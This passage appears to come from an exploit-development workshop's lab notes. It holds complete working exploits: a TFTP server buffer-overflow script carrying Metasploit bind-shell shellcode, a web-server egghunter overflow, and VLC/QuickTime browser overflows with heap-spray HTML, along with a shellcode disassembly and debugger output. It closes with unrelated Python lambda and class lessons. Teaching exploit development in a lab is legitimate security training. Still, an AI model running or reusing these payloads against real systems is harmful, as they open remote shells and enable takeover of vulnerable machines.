4238. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
4239. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
4240.          ^^^^^^^^^^^^^^^^
4241.               ABBA
4242.                                         JMP ESP
4243.                                        /
4244.                                       /
4245. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
4246. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
4247.  
4248.  
4249.  
4250.  
4251. -----sws3.py-----
4252. #!/usr/bin/python2
4253.  
4254. import os # for output setting
4255. import sys
4256. import struct # for pack function
4257.  
4258. # turn off output buffer and set binary mode
4259. sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
4260.  
4261.  
4262. pad = "A" * 225        # distance to EIP
4263. eip = 0x7e429353       # replace EIP to point to "jmp esp" from user32.dll
4264.  
4265. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
4266. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
4267.  
4268. shellcode = "\xCC" * 700
4269.  
4270. buf = "GET /"
4271. buf += pad + struct.pack('<I', eip) + egghunter
4272. buf += " HTTP/1.0\r\n"
4273. buf += "User-Agent: ABBAABBA"
4274. buf += shellcode
4275. buf += " HTTP/1.0\r\n"
4276.  
4277. sys.stdout.write(buf)
4278. -----
4279.  
4280.  
4281.  
4282.  
4283. ############################################
4284. # Lab 2b: Not Enough Space (Negative Jump) #
4285. ############################################
4286. ---------------------------Type This-----------------------------------
4287.  
4288. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
4289. -----------------------------------------------------------------------
4290.  
4291.  
4292. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
4293.  
4294.                                                                        ^
4295. 1 ----------------------1 overflow the buffer---------------------------|
4296.                                                                      
4297.                                                                        ^                            ^
4298.                                                                        |
4299.                                                                        2 ----jump over seh record---|
4300.  
4301.                                                                                                     ^                          ^      
4302.                                                                                                     |
4303.                                                                                                     3--POP 2 words off stack---|
4304.  
4305.                                                                                                                                        ^                                      
4306. 4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|
4307.  
4308.  
4309. #########################################
4310. # Lab 2c: Not Enough Space (Trampoline) #
4311. #########################################
4312.  
4313. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
4314. On the Strategicsec-XP-ED-Target-VM VM
4315.  
4316. - open a command prompt
4317. - c:\software\tftpd32
4318. - run tftpd32.exe
4319. - UDP port 69
4320. (socket code is already in the scripts)
4321.  
4322.  
4323.  
4324.  
4325. On your attack host please install:
4326.  
4327.  
4328.  NASM - Netwide Assembler
4329.  
4330.  
4331.  
4332.  
4333.  
4334. -----------------------------------------------------------------------------------------------------------------
4335.  
4336.  
4337. We want to generate the shellcode (BIND SHELL on Port 4444)
4338. - No restricted characters
4339. - Encoder: NONE
4340.  
4341. Create a Python file called dumpshellcode.py
4342.  
4343. ---
4344. #!/usr/bin/python2
4345.  
4346. import os
4347. import sys
4348. import struct
4349.  
4350.  
4351. # win32_bind -  EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
4352. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
4353. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
4354. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
4355. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
4356. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
4357. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
4358. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
4359. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
4360. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
4361. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
4362. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
4363. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
4364. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
4365. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
4366. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
4367. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
4368. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
4369. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
4370. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
4371. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
4372.  
4373. sys.stdout.write(shellcode)
4374. ---
4375.  
4376. ---------------------------Type This-----------------------------------
4377.  
4378.  
4379. python dumpshell.py > bindshell.bin
4380.  
4381. copy bindshellcode.bin into the "c:\Program Files\nasm" directory
4382. -----------------------------------------------------------------------
4383.  
4384.  
4385.  
4386. Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
4387. 317 bindshell.bin
4388. ---------------------------Type This-----------------------------------
4389.  
4390. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
4391. -----------------------------------------------------------------------
4392.  
4393. 00000000  FC                cld
4394. 00000001  6AEB              push byte -0x15
4395. 00000003  4D                dec ebp
4396. 00000004  E8F9FFFFFF        call dword 0x2
4397. 00000009  60                pushad
4398. 0000000A  8B6C2424          mov ebp,[esp+0x24]
4399. 0000000E  8B453C            mov eax,[ebp+0x3c]
4400. 00000011  8B7C0578          mov edi,[ebp+eax+0x78]
4401. 00000015  01EF              add edi,ebp
4402. 00000017  8B4F18            mov ecx,[edi+0x18]
4403. 0000001A  8B5F20            mov ebx,[edi+0x20]
4404. 0000001D  01EB              add ebx,ebp
4405. 0000001F  49                dec ecx
4406. 00000020  8B348B            mov esi,[ebx+ecx*4]
4407. 00000023  01EE              add esi,ebp
4408. 00000025  31C0              xor eax,eax
4409. 00000027  99                cdq
4410. 00000028  AC                lodsb
4411. 00000029  84C0              test al,al
4412. 0000002B  7407              jz 0x34
4413. 0000002D  C1CA0D            ror edx,0xd
4414. 00000030  01C2              add edx,eax
4415. 00000032  EBF4              jmp short 0x28
4416. 00000034  3B542428          cmp edx,[esp+0x28]
4417. 00000038  75E5              jnz 0x1f
4418. 0000003A  8B5F24            mov ebx,[edi+0x24]
4419. 0000003D  01EB              add ebx,ebp
4420. 0000003F  668B0C4B          mov cx,[ebx+ecx*2]
4421. 00000043  8B5F1C            mov ebx,[edi+0x1c]
4422. 00000046  01EB              add ebx,ebp
4423. 00000048  032C8B            add ebp,[ebx+ecx*4]
4424. 0000004B  896C241C          mov [esp+0x1c],ebp
4425. 0000004F  61                popad
4426. 00000050  C3                ret
4427. 00000051  31DB              xor ebx,ebx
4428. 00000053  648B4330          mov eax,[fs:ebx+0x30]
4429. 00000057  8B400C            mov eax,[eax+0xc]
4430. 0000005A  8B701C            mov esi,[eax+0x1c]
4431. 0000005D  AD                lodsd
4432. 0000005E  8B4008            mov eax,[eax+0x8]
4433. 00000061  5E                pop esi
4434. 00000062  688E4E0EEC        push dword 0xec0e4e8e
4435. 00000067  50                push eax
4436. 00000068  FFD6              call esi
4437. 0000006A  6653              push bx
4438. 0000006C  66683332          push word 0x3233
4439. 00000070  687773325F        push dword 0x5f327377
4440. 00000075  54                push esp
4441. 00000076  FFD0              call eax
4442. 00000078  68CBEDFC3B        push dword 0x3bfcedcb
4443. 0000007D  50                push eax
4444. 0000007E  FFD6              call esi                     PART 1
4445. 00000080  5F                pop edi
4446. 00000081  89E5              mov ebp,esp
4447. 00000083  6681ED0802        sub bp,0x208
4448. 00000088  55                push ebp
4449. 00000089  6A02              push byte +0x2
4450. 0000008B  FFD0              call eax
4451. 0000008D  68D909F5AD        push dword 0xadf509d9
4452. 00000092  57                push edi
4453. 00000093  FFD6              call esi
4454. 00000095  53                push ebx
4455. 00000096  53                push ebx
4456. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
4457. 00000097  53                push ebx
4458. 00000098  53                push ebx
4459. 00000099  53                push ebx
4460. 0000009A  43                inc ebx
4461. 0000009B  53                push ebx
4462. 0000009C  43                inc ebx
4463. 0000009D  53                push ebx                       PART 2
4464. 0000009E  FFD0              call eax
4465. 000000A0  6668115C          push word 0x5c11
4466. 000000A4  6653              push bx
4467. 000000A6  89E1              mov ecx,esp
4468. 000000A8  95                xchg eax,ebp
4469. 000000A9  68A41A70C7        push dword 0xc7701aa4
4470. 000000AE  57                push edi
4471. 000000AF  FFD6              call esi
4472. 000000B1  6A10              push byte +0x10
4473. 000000B3  51                push ecx
4474. 000000B4  55                push ebp
4475. 000000B5  FFD0              call eax
4476. 000000B7  68A4AD2EE9        push dword 0xe92eada4
4477. 000000BC  57                push edi
4478. 000000BD  FFD6              call esi
4479. 000000BF  53                push ebx
4480. 000000C0  55                push ebp
4481. 000000C1  FFD0              call eax
4482. 000000C3  68E5498649        push dword 0x498649e5
4483. 000000C8  57                push edi
4484. 000000C9  FFD6              call esi
4485. 000000CB  50                push eax
4486. 000000CC  54                push esp
4487. 000000CD  54                push esp
4488. 000000CE  55                push ebp
4489. 000000CF  FFD0              call eax
4490. 000000D1  93                xchg eax,ebx
4491. 000000D2  68E779C679        push dword 0x79c679e7
4492. 000000D7  57                push edi
4493. 000000D8  FFD6              call esi
4494. 000000DA  55                push ebp
4495. 000000DB  FFD0              call eax
4496. 000000DD  666A64            push word 0x64
4497. 000000E0  6668636D          push word 0x6d63
4498. 000000E4  89E5              mov ebp,esp
4499. 000000E6  6A50              push byte +0x50
4500. 000000E8  59                pop ecx
4501. 000000E9  29CC              sub esp,ecx
4502. 000000EB  89E7              mov edi,esp
4503. 000000ED  6A44              push byte +0x44
4504. 000000EF  89E2              mov edx,esp
4505. 000000F1  31C0              xor eax,eax
4506. 000000F3  F3AA              rep stosb
4507. 000000F5  FE422D            inc byte [edx+0x2d]
4508. 000000F8  FE422C            inc byte [edx+0x2c]
4509. 000000FB  93                xchg eax,ebx
4510. 000000FC  8D7A38            lea edi,[edx+0x38]
4511. 000000FF  AB                stosd
4512. 00000100  AB                stosd
4513. 00000101  AB                stosd
4514. 00000102  6872FEB316        push dword 0x16b3fe72
4515. 00000107  FF7544            push dword [ebp+0x44]
4516. 0000010A  FFD6              call esi
4517. 0000010C  5B                pop ebx
4518. 0000010D  57                push edi
4519. 0000010E  52                push edx
4520. 0000010F  51                push ecx
4521. 00000110  51                push ecx
4522. 00000111  51                push ecx
4523. 00000112  6A01              push byte +0x1
4524. 00000114  51                push ecx
4525. 00000115  51                push ecx
4526. 00000116  55                push ebp
4527. 00000117  51                push ecx
4528. 00000118  FFD0              call eax
4529. 0000011A  68ADD905CE        push dword 0xce05d9ad
4530. 0000011F  53                push ebx
4531. 00000120  FFD6              call esi
4532. 00000122  6AFF              push byte -0x1
4533. 00000124  FF37              push dword [edi]
4534. 00000126  FFD0              call eax
4535. 00000128  8B57FC            mov edx,[edi-0x4]
4536. 0000012B  83C464            add esp,byte +0x64
4537. 0000012E  FFD6              call esi
4538. 00000130  52                push edx
4539. 00000131  FFD0              call eax
4540. 00000133  68F08A045F        push dword 0x5f048af0
4541. 00000138  53                push ebx
4542. 00000139  FFD6              call esi
4543. 0000013B  FFD0              call eax
4544.  
4545.  
4546.  
4547.  
4548. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
4549. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
4550. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
4551. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
4552. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
4553. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
4554. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
4555. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
4556. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
4557. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
4558.  
4559.  
4560. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
4561. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
4562. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
4563. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
4564. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
4565. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
4566. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
4567. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
4568. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
4569. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
4570. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
4571.  
4572.  
4573. STACK SHIFTER:
4574. prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  # add esp, -1001h
4575. prepend += "\x44"                     # inc esp
4576.  
4577.  
4578.  
4579.  
4580.  
4581.  
4582.  
4583.  
4584.  
4585.  
4586.  
4587.  
4588.  
4589.  
4590. ---- final script ----
4591.  
4592. #!/usr/bin/python2
4593. #TFTP Server remote Buffer Overflow
4594.  
4595. import sys
4596. import socket
4597. import struct
4598.  
4599. if len(sys.argv) < 2:
4600.        sys.stderr.write("Usage: tftpd.py <host>\n")
4601.        sys.exit(1)
4602.  
4603. target = sys.argv[1]
4604. port = 69
4605.  
4606. eip = 0x7e429353         # jmp esp in USER32.DLL
4607.  
4608. part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
4609. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
4610. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
4611. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
4612. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
4613. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
4614. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
4615. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
4616. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
4617. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
4618.  
4619. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
4620. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
4621. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
4622. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
4623. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
4624. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
4625. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
4626. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
4627. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
4628. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
4629. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
4630.  
4631. prepend = "\x81\xC4\xFF\xEF\xFF\xFF"                    # add esp, -1001h
4632. prepend += "\x44"                                       # inc esp
4633.  
4634. buf = "\x00\x01"                                        # receive command
4635.  
4636. buf += "\x90" * (256 - len(part2))                      # NOPs
4637. buf += part2                                            # shellcode part 2
4638. buf += struct.pack('<I', eip)                           # EIP (JMP ESP)
4639. buf += prepend                                          # stack shifter
4640. buf += part1                                            # shellcode part 1
4641. buf += "\xE9" + struct.pack('<i', -380)                 # JMP -380
4642. buf += "\x00"                                           # END
4643.  
4644. # print buf
4645.  
4646. # buf = "\x00\x01"                                      # receive command
4647.  
4648. # buf += "A" * 300 + "\x00"
4649.  
4650. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
4651.  
4652. try:
4653.        sock.connect((target, port))
4654.        sock.sendall(buf)
4655. except Exception as e:
4656.        sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
4657. finally:
4658.        sock.close()
4659.        sys.stderr.write("Sent.\n")
4660.  
4661.  
4662.  
4663. -----------------------------------------------------------------------------------------------------------------
4664.  
4665.  
4666.  
4667.  
4668. How does all of this actually work
4669.  
4670.  
4671.  
4672.  
4673. Total shellcode length:         315
4674.      
4675.                                Part1:  150
4676.                                Part2:  165
4677.  
4678.  
4679. NOPS * (256 - 165)
4680.  
4681. 91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
4682.                        |                       |                                       |
4683.                        256                     260                                     150 (410)               |
4684.  |<------------------------------------------------------------------------------------------------------------|                                                                                                                                                              
4685. Jump to the
4686. 30 byte mark
4687.  
4688.  
4689.  
4690. ############################
4691. # Lab 3: Browsers Exploits #
4692. ############################
4693.  
4694. ---------------------------Type This-----------------------------------
4695.  
4696. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
4697. -----------------------------------------------------------------------
4698.  
4699.  
4700. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
4701. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
4702.  
4703. <object id=quicktime clsid="999-999999-99-99999">
4704.  <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
4705. </object>
4706.  
4707. var buf = "";
4708. for(i = 0; i < 50000; i++)
4709.   buf += "A";
4710. var myobject = document.getElementById("quicktime");
4711. myobject.url = buf;
4712.  
4713. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
4714.  
4715. - Browsers (Flash)
4716. - PDF
4717. - MS Office / OOo
4718.  
4719. VLC smb:// exploit
4720. ------------------
4721.  
4722. EXPLOIT VECTOR
4723.  
4724. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
4725.  
4726. Exploit Scripts
4727. - ffvlc
4728.  
4729. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
4730.  
4731. ---------------------------Type This-----------------------------------
4732.  
4733. perl daemon.pl vlc0.html
4734. -----------------------------------------------------------------------
4735.  
4736. ON YOUR Strategicsec-XP-ED-Target-VM VM, START FIREFOX
4737. Browse to http://your_host_ip_address:8080/
4738.  
4739. vlc0.html
4740. ---------
4741. <script>
4742.   var buf = "";
4743.   for(i = 0; i < 1250; i++)
4744.      buf += unescape("%41%41%41%41");
4745.   var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
4746.   document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
4747. </script>
4748.  
4749. vlc1.html
4750. ---------
4751. <script>
4752.  
4753.   // shellcode created in heap memory
4754.   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
4755.  
4756.   // 800K block of NOPS
4757.   var nop = unescape("%u9090%u09090");   // 4 NOPS
4758.   while(nop.length < 0xc0000) {
4759.      nop += nop;
4760.   }
4761.  
4762.   // spray the heap with NOP+shellcode
4763.   var memory = new Array();
4764.   for(i = 0; i < 50; i++) {
4765.      memory[i] = nop + shellcode;
4766.   }
4767.  
4768.   // build the exploit payload
4769.   var buf = "";
4770.   for(i = 0; i < 1250; i++)
4771.      buf += unescape("%41%41%41%41");
4772.   var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
4773.  
4774.   // trigger the exploit
4775.   document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
4776. </script>
4777.  
4778. ---------------------------Type This-----------------------------------
4779.  
4780. perl daemon.pl vlc1.html
4781. -----------------------------------------------------------------------
4782.  
4783. Search for where our NOPS+shellcode lies in the heap
4784.  
4785. s 0 l fffffff 90 90 90 90 cc cc cc cc
4786.  
4787. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
4788. 03dffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4789. 040ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4790. 043ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4791. 046ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4792. 049ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4793. 04cffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4794. 04fffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4795. 052ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4796. 055ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4797. 058ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4798. 05bffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4799. 05effffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4800. 061ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4801. 064ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4802. 067ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4803. 06affffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
4804.  
4805. Edit vlc2.html
4806. replace %41%41%41%41 with %07%07%07%07
4807.  
4808. (928.fd0): Break instruction exception - code 80000003 (first chance)
4809. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
4810. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0         nv up ei pl nz ac pe nc
4811. cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
4812. 07100000 cc              int     3
4813. 0:019> u
4814. 07100000 cc              int     3
4815. 07100001 cc              int     3
4816. 07100002 cc              int     3
4817. 07100003 cc              int     3
4818. 07100004 cc              int     3
4819. 07100005 cc              int     3
4820. 07100006 cc              int     3
4821. 07100007 cc              int     3
4822.  
4823. Create vlc3.html (Copy vlc2.html to vlc3.html)
4824. ----------------------------------------------
4825. Win32 Reverse Shell
4826. - no restricted characters
4827. - Encoder NONE
4828. - use the Javascript encoded payload generated by msfweb
4829.  
4830. ##########################
4831. # Python Lambda Function #
4832. ##########################
4833.  
4834.  
4835. Python allows you to create anonymous function i.e function having no names using a facility called lambda function.
4836.  
4837. lambda functions are small functions usually not more than a line. It can have any number of arguments just like a normal function. The body of lambda functions is very small and consists of only one expression. The result of the expression is the value when the lambda is applied to an argument. Also there is no need for any return statement in lambda function.
4838.  
4839. Let’s take an example:
4840.  
4841. Consider a function multiply()
4842.  
4843. def multiply(x, y):
4844.    return x * y
4845.  
4846.  
4847. This function is too small, so let’s convert it into a lambda function.
4848.  
4849. To create a lambda function first write keyword lambda followed by one of more arguments separated by comma, followed by colon sign ( : ), followed by a single line expression.
4850.  
4851. ---------------------------Type This-----------------------------------
4852.  
4853. >>> r = lambda x, y: x * y
4854. >>> r(12,3)
4855. 36
4856. -----------------------------------------------------------------------
4857.  
4858. Here we are using two arguments x  and y , expression after colon is the body of the lambda function. As you can see lambda function has no name and is called through the variable it is assigned to.
4859.  
4860. You don’t need to assign lambda function to a variable.
4861.  
4862. ---------------------------Type This-----------------------------------
4863.  
4864. >>> (lambda x, y: x * y)(3,4)
4865. 12
4866. -----------------------------------------------------------------------
4867.  
4868. Note that lambda function can’t contain more than one expression.
4869.  
4870.  
4871.  
4872. ##################
4873. # Python Classes #
4874. ##################
4875.  
4876.  
4877. ****************
4878. * Introduction *
4879. ****************
4880.  
4881. Classes are the cornerstone of Object Oriented Programming. They are the blueprints used to create objects. And, as the name suggests, all of Object Oriented Programming centers around the use of objects to build programs.
4882.  
4883. You don't write objects, not really. They are created, or instantiated, in a program using a class as their basis. So, you design objects by writing classes. That means that the most important part of understanding Object Oriented Programming is understanding what classes are and how they work.
4884.  
4885.  
4886. ***********************
4887. * Real World Examples *
4888. ***********************
4889.  
4890.  
4891. This next part if going to get abstract. You can think of objects in programming just like objects in the real world. Classes are then the way you would describe those objects and the plans for what they can do.
4892.  
4893. Start off by thinking about a web vuln scanner.
4894.  
4895. What about what they can do? Nearly every web vuln scanner can do the same basic things, but they just might do them differently or at different speeds. You could then describe the actions that a vuln scanner can perform using functions. In Object Oriented Programming, though, functions are called methods.
4896.  
4897. So, if you were looking to use "vuln scanner" objects in your program, you would create a "vuln scanner" class to serve as a blueprint with all of the variables that you would want to hold information about your "vuln scanner" objects and all of the methods to describe what you would like your vuln scanner to be able to do.
4898.  
4899.  
4900. ******************
4901. * A Python Class *
4902. ******************
4903.  
4904.  
4905. Now that you have a general idea of what a class is, it's best to take a look at a real Python class and study how it is structured.
4906.  
4907. ---------------------------Paste This-----------------------------------
4908.  
4909. class WebVulnScanner(object):
4910.    make = 'Acunetix'
4911.    model = '10.5'
4912.    year = '2014'
4913.    version ='Consultant Edition'
4914.  
4915.    profile = 'High Risk'
4916.  
4917.  
